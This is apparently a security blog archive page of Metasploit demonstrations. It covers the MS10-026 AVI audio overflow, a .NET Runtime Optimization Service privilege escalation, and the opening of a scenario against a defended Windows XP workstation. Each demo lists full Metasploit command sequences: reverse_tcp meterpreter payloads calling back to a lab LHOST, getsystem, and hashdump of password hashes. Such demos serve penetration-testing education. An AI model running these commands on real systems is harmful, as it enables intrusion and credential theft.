Tag Archives: Windows

MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12

PoC provided by :

Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez

Reference(s) :

CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Tested on Windows XP SP3 with :

Internet Explorer 6

Description :

This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0’s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.

Commands :

use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation

Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework include 4.0 and 2.0

Tested on Windows XP SP3 with :

With Microsoft.NET Framework v2.0.50727 mscorsvw.exe

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump

Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus

Third scenario of the Metasploit Exploitation Scenarios.

Here, the user is a standard user, protected by 5 countermeasures :

– Firewall rules how limit the outbound connexions only on special ports.
– Transparent HTTP/S Proxy for web surfing.
– Dual antivirus (Avira / Clamav) scanning for web surfing (useless in the case, due to the Astaro bugs).
– Dr.Web Antivirus on the target Windows XP.
– Windows Firewall on the target Windows XP.